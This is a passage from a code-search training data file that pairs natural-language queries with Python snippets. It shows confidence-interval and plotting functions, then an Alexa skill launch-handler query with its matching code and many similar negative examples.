np.array(data_list)\n assert (data > 0).sum() == 287\n data_estimate = np.sum(data) * 1e-3\n assert abs((data_estimate / 32) - 1) < 0.0005\n bsd = bootstrap_se_ci(data, seed, bs_samples, np.sum, alpha)\n stderr = bsd['se'] * 1e-3\n cilo = bsd['cilo'] * 1e-3\n cihi = bsd['cihi'] * 1e-3\n if dump:\n res = '{}EST={:.1f} B={} alpha={:.3f} se={:.2f} ci=[ {:.2f} , {:.2f} ]'\n print(\n res.format('STANDARD-BIN10: ',\n data_estimate, bs_samples, alpha, stderr, cilo, cihi)\n )\n assert abs((stderr / 1.90) - 1) < 0.0008\n # NOTE: a se of 1.90 thousand implies that when comparing the difference\n # in the weighted number of filing units in STANDARD bin 10 with a\n # tax increase, the difference statistic has a bigger se (because\n # the variance of the difference is the sum of the variances of the\n # two point estimates). So, in STANDARD bin 10 if the point\n # estimates both had se = 1.90, then the difference in the point\n # estimates has has a se = 2.687. This means that the difference\n # would have to be over 5 thousand in order for there to be high\n # confidence that the difference was different from zero in a\n # statistically significant manner.\n # Or put a different way, a difference of 1 thousand cannot be\n # accurately detected while a difference of 10 thousand can be\n # accurately detected.\n assert abs((cilo / 28.33) - 1) < 0.0012\n assert abs((cihi / 35.81) - 1) < 0.0012\n # compute stderr and confidence interval for STANDARD bin 11 increase count\n data_list = [27.517] * 981 + [0.0] * (23113 - 981)\n assert len(data_list) == 23113\n data = np.array(data_list)\n assert (data > 0).sum() == 981\n data_estimate = np.sum(data) * 1e-3\n assert abs((data_estimate / 27) - 1) < 0.0005\n bsd = bootstrap_se_ci(data, seed, bs_samples, np.sum, alpha)\n stderr = bsd['se'] * 1e-3\n cilo = bsd['cilo'] * 1e-3\n cihi = bsd['cihi'] * 1e-3\n if dump:\n res = '{}EST={:.1f} B={} alpha={:.3f} se={:.2f} ci=[ {:.2f} , {:.2f} ]'\n print(\n res.format('STANDARD-BIN11: ',\n data_estimate, bs_samples, alpha, stderr, cilo, cihi)\n )\n assert abs((stderr / 0.85) - 1) < 0.0040\n # NOTE: a se of 0.85 thousand implies that when comparing the difference\n # in the weighted number of filing units in STANDARD bin 11 with a\n # tax increase, the difference statistic has a bigger se (because\n # the variance of the difference is the sum of the variances of the\n # two point estimates). So, in STANDARD bin 11 if point estimates\n # both had se = 0.85, then the difference in the point estimates has\n # has a se = 1.20. This means that the difference would have to be\n # over 2.5 thousand in order for there to be high confidence that the\n # difference was different from zero in a statistically significant\n # manner.\n # Or put a different way, a difference of 1 thousand cannot be\n # accurately detected while a difference of 10 thousand can be\n # accurately detected.\n assert abs((cilo / 25.37) - 1) < 0.0012\n assert abs((cihi / 28.65) - 1) < 0.0012\n # fail if doing dump\n assert not dump", "def estimates_conf(self):\n return self._est_L, self._est_R", "def _interval_example(avg_price_with_interval):\n ch = chartify.Chart(blank_labels=True, x_axis_type=\"categorical\")\n ch.set_title(\"Interval plots\")\n ch.set_subtitle(\"Represent variation. Optional `middle_column` to mark a middle point.\")\n ch.plot.interval(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n lower_bound_column=\"lower_ci\",\n upper_bound_column=\"upper_ci\",\n middle_column=\"mean\",\n )\n ch.show(_OUTPUT_FORMAT)", "def test_chao1_confidence(self): \n #NOTE: EstimateS rounds to 2 dp\n self.assertFloatEqual(chao1_confidence(self.TestData), (9.07,17.45), \\\n eps=0.01)\n self.assertFloatEqual(chao1_confidence(self.TestData, \\\n bias_corrected=False), (9.17,21.89), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoSingles),\\\n (4, 4.95), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoSingles, \\\n bias_corrected=False), (4,4.95), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoDoubles), \\\n (4.08,17.27), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoDoubles, \\\n bias_corrected=False), (4.08,17.27), eps=0.01)", "def confidence(self, confidence: float):\n\n self._confidence = confidence", "def get_confidence_interval(self, value, precision_digits, search_region, debug=False):\n log_value = np.log10(value)\n if self.wrap_interpolator:\n # Try to interpolate the limit from limits computed earlier\n self.log.debug(\"Trying to get values from interpolators\")\n try:\n if self.fixed_lower_limit is None:\n low_limit = 10**(self.low_limit_interpolator(log_value))\n else:\n low_limit = self.fixed_lower_limit\n if self.fixed_upper_limit is None:\n high_limit = 10**(self.high_limit_interpolator(log_value))\n else:\n high_limit = self.fixed_upper_limit\n return low_limit, high_limit\n except InsufficientPrecisionError:\n self.log.debug(\"Insuffienct precision achieved by interpolators\")\n if log_value > self.interpolator_log_domain[1]:\n self.log.debug(\"Too high value to dare to start Neyman construction... raising exception\")\n # It is not safe to do the Neyman construction: too high statistics\n raise\n self.log.debug(\"Log value %s is below interpolator log domain max %s \"\n \"=> starting Neyman construction\" % (log_value, self.interpolator_log_domain[1]))\n except OutsideDomainError:\n # The value is below the interpolator domain (e.g. 0 while the domain ends at 10**0 = 1)\n pass\n\n if self.forbid_exact_computation:\n raise RuntimeError(\"Exact computation triggered\")\n\n def is_value_in(mu):\n low_lim, high_lim = self.get_interval_on_statistic(mu + self.background,\n precision_digits=precision_digits)\n return low_lim <= value <= high_lim\n\n # We first need one value in the interval to bound the limit searches\n try:\n true_point, low_search_bound, high_search_bound = search_true_instance(is_value_in,\n *search_region,\n precision_digits=precision_digits)\n except SearchFailedException as e:\n self.log.debug(\"Exploratory search could not find a single value in the interval! \"\n \"This is probably a problem with search region, or simply a very extreme case.\"\n \"Original exception: %s\" % str(e))\n if is_value_in(0):\n self.log.debug(\"Oh, ok, only zero is in the interval... Returning (0, 0)\")\n return 0, 0\n return 0, float('inf')\n\n self.log.debug(\">>> Exploratory search completed: %s is in interval, \"\n \"search for boundaries in [%s, %s]\" % (true_point, low_search_bound, high_search_bound))\n\n if self.fixed_lower_limit is not None:\n low_limit = self.fixed_lower_limit\n elif is_value_in(low_search_bound):\n # If mu=0 can't be excluded, we're apparently only setting an upper limit (mu <= ..)\n low_limit = 0\n else:\n low_limit = bisect_search(is_value_in, low_search_bound, true_point, precision_digits=precision_digits)\n self.log.debug(\">>> Low limit found at %s\" % low_limit)\n\n if self.fixed_upper_limit is not None:\n low_limit = self.fixed_upper_limit\n elif is_value_in(high_search_bound):\n # If max_mu can't be excluded, we're apparently only setting a lower limit (mu >= ..)\n high_limit = float('inf')\n else:\n high_limit = bisect_search(is_value_in, true_point, high_search_bound, precision_digits=precision_digits)\n self.log.debug(\">>> High limit found at %s\" % high_limit)\n\n if self.wrap_interpolator:\n # Add the values to the interpolator, if they are within the domain\n # TODO: Think about dealing with inf\n if self.interpolator_log_domain[0] <= log_value <= self.interpolator_log_domain[1]:\n if self.fixed_lower_limit is None:\n self.low_limit_interpolator.add_point(log_value, np.log10(low_limit))\n if self.fixed_upper_limit is None:\n self.high_limit_interpolator.add_point(log_value, np.log10(high_limit))\n\n return low_limit, high_limit", "def _interval_example2(avg_price_with_interval):\n ch = chartify.Chart(blank_labels=True, x_axis_type=\"categorical\")\n ch.set_title(\"Combined interval plot & bar plot\")\n ch.plot.bar(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n numeric_column=\"mean\",\n )\n ch.plot.interval(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n lower_bound_column=\"lower_ci\",\n upper_bound_column=\"upper_ci\",\n )\n ch.show(_OUTPUT_FORMAT)", "def _lower_confidence_bound(self, NA: int, N: int, alpha: float) -> float:\n return proportion_confint(NA, N, alpha=2 * alpha, method=\"beta\")[0]", "def cre_confidence2(df): \r\n cre_list = df.creline.unique()\r\n areas = df.source.unique()\r\n n=len(areas)\r\n confnew =pd.DataFrame(np.zeros(len(df.index)),index=df.index, columns=['conf'])\r\n \r\n for kk in range(0,len(cre_list)):\r\n df_cre = df[df.creline == cre_list[kk]]\r\n print cre_list[kk]\r\n count_sym = 0\r\n count_sameffb = 0\r\n for ii in range(0,n):\r\n for jj in range(ii+1,n):\r\n ij_ffb = np.array(df_cre[(df.source == areas[ii])&(df.target == areas[jj])].ffb_c)\r\n ji_ffb = np.array(df_cre[(df.source == areas[jj])&(df.target == areas[ii])].ffb_c)\r\n if len(ij_ffb)==1 and len(ji_ffb)==1:\r\n count_sym = count_sym+1\r\n if ij_ffb == ji_ffb:\r\n count_sameffb = count_sameffb+1 \r\n confnew[df.creline == cre_list[kk]] = 1-count_sameffb/count_sym\r\n return confnew", "def test_error_at_confidence(self, threshold):\r\n\r\n nominator = numpy.sum(numpy.logical_and(self.test_errors, self.test_confidences >= threshold))\r\n denominator = numpy.sum(self.test_confidences >= threshold)\r\n if denominator > 0:\r\n return nominator / float(denominator)\r\n else:\r\n return 0", "def compute_adjacency_confidence(self, full_attachedness, tree_adjacency, tree_based_confidence):\n if sp.sparse.issparse(tree_adjacency):\n tree_adjacency = [tree_adjacency[i].nonzero()[1] for i in range(tree_adjacency.shape[0])]\n segs_distances = 1/full_attachedness\n if not tree_based_confidence: # inter- and intra-cluster based confidence\n from scipy.stats import norm\n # intra-cluster connections\n total_n = self.k * np.array(self.segs_sizes) # total number of connections\n a = full_attachedness\n confidence = np.zeros_like(full_attachedness)\n for i in range(a.shape[0]):\n for j in range(i+1, a.shape[1]):\n expected = total_n[i] * total_n[j] / np.sum(total_n)**2\n actual = a[i, j] / np.sum(total_n)\n variance = expected * (1 - expected) / np.sum(total_n)\n if actual > expected:\n confidence[i, j] = 1\n elif actual < 1e-12:\n confidence[i, j] = 0\n else:\n confidence[i, j] = 2 * norm.cdf(actual, expected, np.sqrt(variance))\n # i_name = self.segs_names_original[i]\n # j_name = self.segs_names_original[j]\n # print(i_name, j_name, expected, actual, variance, confidence[i, j])\n full_confidence = confidence + confidence.T\n tree_confidence = self.compute_tree_confidence(full_confidence, tree_adjacency)\n else:\n # compute the average tree distances\n tree_distances = []\n for i, neighbors in enumerate(tree_adjacency):\n tree_distances += segs_distances[i][neighbors].tolist()\n median_tree_distances = np.median(tree_distances)\n full_confidence = np.zeros_like(segs_distances)\n full_confidence[segs_distances <= median_tree_distances] = 1\n full_confidence[segs_distances > median_tree_distances] = (\n np.exp(-(segs_distances-median_tree_distances)/median_tree_distances)\n [segs_distances > median_tree_distances])\n np.fill_diagonal(full_confidence, 0)\n tree_confidence = self.compute_tree_confidence(full_confidence, tree_adjacency, minimal_tree_attachedness=MINIMAL_TREE_ATTACHEDNESS)\n return full_confidence, tree_confidence", "def test_conf_interval_normal_method_fallback(data):\n df = data[\"df\"]\n df = df.sample(n=10)\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"normal_fit\"``\n # fallback expected for all slices as df is small (10)\n # and ``sample_size_thresh`` is large (20)\n with pytest.warns(Warning):\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=20,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.31, 290.57, 292.23, 292.49), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def confidence(s, p):\r\n\r\n if p == 1:\r\n return (-oo, oo)\r\n\r\n assert p <= 1\r\n\r\n # In terms of n*sigma, we have n = sqrt(2)*ierf(p). The inverse\r\n # error function is not yet implemented in SymPy but can easily be\r\n # computed numerically\r\n\r\n from sympy.numerics import Float, secant, evalf\r\n from sympy.numerics.functions2 import erf\r\n p = evalf(p)\r\n # calculate y = ierf(p) by solving erf(y) - p = 0\r\n y = secant(lambda y: erf(y) - p, 0)\r\n t = Real(str(evalf(s.sigma) * Float(2)**0.5 * y))\r\n mu = s.mu.evalf()\r\n return (mu-t, mu+t)", "def confidence_coefficient( confidence_level, dimensions=1 ):\n return np.sqrt(chi2.ppf(confidence_level, df=dimensions))", "def calcAccuracy(measuredConc, expectedConc):\n accuracy = (numpy.mean(measuredConc) / expectedConc) * 100\n return accuracy", "def ci_mean_std_known(array, std, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n mean = np.mean(array)\n n = len(array)\n # calculate standard error\n std_error = std / np.sqrt(n)\n # find z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def plot_bootstrapped_reliability_curve(\n axes_object, ci_bottom_dict, ci_mean_dict, ci_top_dict,\n line_colour=DEFAULT_RELIABILITY_COLOUR,\n line_width=DEFAULT_RELIABILITY_WIDTH,\n perfect_line_colour=DEFAULT_PERFECT_RELIABILITY_COLOUR,\n perfect_line_width=DEFAULT_PERFECT_RELIABILITY_WIDTH):\n\n plot_reliability_curve(\n axes_object=axes_object,\n mean_forecast_by_bin=ci_mean_dict[\n model_eval.MEAN_FORECAST_BY_BIN_KEY],\n event_frequency_by_bin=ci_mean_dict[model_eval.EVENT_FREQ_BY_BIN_KEY],\n line_colour=line_colour, line_width=line_width,\n perfect_line_colour=perfect_line_colour,\n perfect_line_width=perfect_line_width)\n\n polygon_object = _confidence_interval_to_polygon(\n x_coords_bottom=ci_bottom_dict[model_eval.MEAN_FORECAST_BY_BIN_KEY],\n y_coords_bottom=ci_bottom_dict[model_eval.EVENT_FREQ_BY_BIN_KEY],\n x_coords_top=ci_top_dict[model_eval.MEAN_FORECAST_BY_BIN_KEY],\n y_coords_top=ci_top_dict[model_eval.EVENT_FREQ_BY_BIN_KEY]\n )\n\n polygon_colour = matplotlib.colors.to_rgba(\n plotting_utils.colour_from_numpy_to_tuple(line_colour),\n TRANSPARENCY_FOR_CONFIDENCE_INTERVAL\n )\n\n polygon_patch = PolygonPatch(\n polygon_object, lw=0, ec=polygon_colour, fc=polygon_colour)\n\n axes_object.add_patch(polygon_patch)", "def _metrics_ci(self, label_true, y_pred):\n hr_pred = -y_pred\n ci = concordance_index(label_true['t'], hr_pred, label_true['e'])\n return ci", "def confidence(self, confidence):\n self._confidence = confidence", "def confidence(self, confidence):\n self._confidence = confidence", "def test_error_curve(self):\r\n\r\n scores = self.test_confidences\r\n sort = numpy.argsort(scores, axis=0)\r\n sorted_scores = scores[sort]\r\n\r\n test_errors = numpy.zeros((scores.shape[0]))\r\n thresholds = numpy.zeros((scores.shape[0]))\r\n\r\n for i in range(sort.shape[0]):\r\n thresholds[i] = sorted_scores[i]\r\n test_errors[i] = numpy.sum(self.test_errors[self.test_confidences >= thresholds[i]]) / float(numpy.sum(self.test_confidences >= thresholds[i]))\r\n\r\n return test_errors, thresholds", "def ci_mean_std_unknown(array, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # mean of the sample\n mean = np.mean(array)\n # standard deviation\n std = np.std(array)\n # size of the sample\n n = len(array)\n # degrees of freedom\n df = n - 1\n # calculate the standard error\n std_error = std / np.sqrt(n)\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, df), 3)\n # margin of error\n margin_of_error = np.round(t_star * std_error, 2)\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def _interval(cls,best,lo,hi):\n return ugali.utils.stats.interval(best,lo,hi)", "def plotcenterrange():\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist)\n plt.title(\"centerplot\")\n plt.xlabel(\"p\")\n plt.ylabel(\"total number of individuals infected\")\n plt.title(\"Total Number of Individuals Infected vs p\")\n plt.show()" ]
[ "0.67617357", "0.67138135", "0.65338296", "0.6432632", "0.6410642", "0.6392413", "0.6342866", "0.6287954", "0.6283847", "0.62821895", "0.60609925", "0.60566366", "0.60566366", "0.60537523", "0.5997194", "0.597665", "0.597048", "0.5967721", "0.59433526", "0.59037447", "0.59007347", "0.58811104", "0.58691156", "0.58635825", "0.5842739", "0.58326304", "0.5799475", "0.5782159", "0.5730345", "0.5696578", "0.5690091", "0.5688129", "0.56775355", "0.5661647", "0.5658036", "0.5647138", "0.5630971", "0.5617234", "0.5558497", "0.5535869", "0.55181223", "0.55016226", "0.55005383", "0.54982674", "0.54978454", "0.5490403", "0.5438073", "0.54233503", "0.541225", "0.5407778", "0.5396027", "0.5384465", "0.5382949", "0.53823966", "0.53814244", "0.5380758", "0.5353496", "0.5329837", "0.5329654", "0.53201914", "0.5280668", "0.5270962", "0.52556664", "0.52323323", "0.5228633", "0.5186192", "0.518201", "0.5179259", "0.51673824", "0.51613915", "0.5150967", "0.5146779", "0.5123679", "0.5119523", "0.51141137", "0.51119804", "0.51079524", "0.51079214", "0.5080909", "0.50733685", "0.5053093", "0.5040213", "0.5014708", "0.5001876", "0.49856374", "0.4976799", "0.4971827", "0.49659073", "0.49637058", "0.49539244", "0.49510017", "0.49508768", "0.49463794", "0.49433288", "0.49413553", "0.49413553", "0.4937703", "0.4935024", "0.4910271", "0.49074844" ]
0.5617236
37
Handler for Skill Launch.
def launch_request_handler(handler_input): # type: (HandlerInput) -> Response speech = "Welcome to the Merriam-Webster Dictionary. What word can I look up for you?" reprompt = "You can say: definition of word, example of word, or synonym of word." handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_launch(launch_request, session):\r\n\r\n #print(\"****on_launch requestId=\" + launch_request['requestId'] +\r\n # \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_help_response()", "def on_launch(launch_request, session):\r\n # Dispatch to your skill's launch message\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return skill_information()", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch message\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] + \", sessionId=\" + session['sessionId'])\n \n # Dispatch to your skill's launch\n return get_welcome_response(session)", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response(session)", "def on_launch(launch_request, session):\n\n session['attributes'] = {}\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(self):\n print(\n MyCityController.LOG_CLASS,\n '[method: on_launch]',\n '[requestId: ' + str(self._mcd.request_id) + ']',\n '[sessionId: ' + str(self._mcd.session_id) + ']'\n )\n # Dispatch to your skill's launch\n return self.get_welcome_response()", "def on_launch(launch_request, session):\n\n\tprint(\"on_launch requestId=\" + launch_request['requestId'] +\n\t\t \", sessionId=\" + session['sessionId'])\n\t# Get's the help section\n\treturn get_welcome_response()", "def on_launch(request):\n\n return get_launch_response()", "def handler(event, context):\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = \"Welcome to the Alexa Skills Kit color session sample.\"\n\n handler_input.response_builder.speak(\n speech + \" \" + help_text).ask(help_text)\n return handler_input.response_builder.response", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n lang = handler_input.request_envelope.request.locale\n try:\n speech = welcome_speech[lang]\n except:\n speech = \"Language \" + lang + \" is not supported.\"\n\n handler_input.response_builder.speak(\n speech).ask(help_text)\n return handler_input.response_builder.response", "def on_launch(event_request, session):\n print(\"=====on_launch requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return play_new_game(False)", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])", "def on_launch(launch_request, session, state):\n\n print(\"on_launch \"+str(launch_request)+\" \"+str(session)+\" requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n # If new or corrupted user, prompt to set up first\n userId = session[\"user\"][\"userId\"]\n query_user = get_info(userId)\n if len(query_user) == 0 or \\\n (len(query_user) > 0 and len(query_user[0].keys()) != NUM_DB_COLS):\n if len(query_user) > 0 and len(query_user[0].keys()) != NUM_DB_COLS:\n delete_info(userId)\n \n return new_user_intro(session, state)\n \n # For existing users, greet by name, talk about main focus, give commands to check in\n return existing_user_intro(session, state)", "def on_launch(event, launch_request, session):\n\n logger.info(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return get_generic_welcome_message()", "def on_launch(request):\n\n return get_launch_error_response()", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = f\"Yo yo yo what's popping. Come checkout what is up with your Monzo\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).set_should_end_session(\n False)\n return handler_input.response_builder.response", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n\n if intent_name not in skillmap:\n intent_name = \"NullSkill\"\n\n if intent_name in skillmap:\n try:\n return skillmap[intent_name].execute(intent, session)\n except Exception as e:\n traceback.print_exc()\n return SkillBase().respond(\"Sorry I missed that\", \"Error\", str(e))\n else:\n raise ValueError(\"Invalid intent\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Welcome to the Transit Time skill, ask when the next bus is coming!\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Transit Time\", speech_text)).set_should_end_session(\n False).response", "def setup_class(cls):\n cls.handler = MyScaffoldHandler(\"handler\", SkillContext())", "def launch(self):", "def test_dispatch_launch(self):\n @self.skill.launch\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n self.skill.response.sessionAttributes['run'] = True\n self.skill.request.request.type = 'LaunchRequest'\n self.skill.dispatch()\n self.assertTrue(self.skill.response.sessionAttributes['run'])", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.xxxx\"):\n #Set Alexa Skill ID\n raise 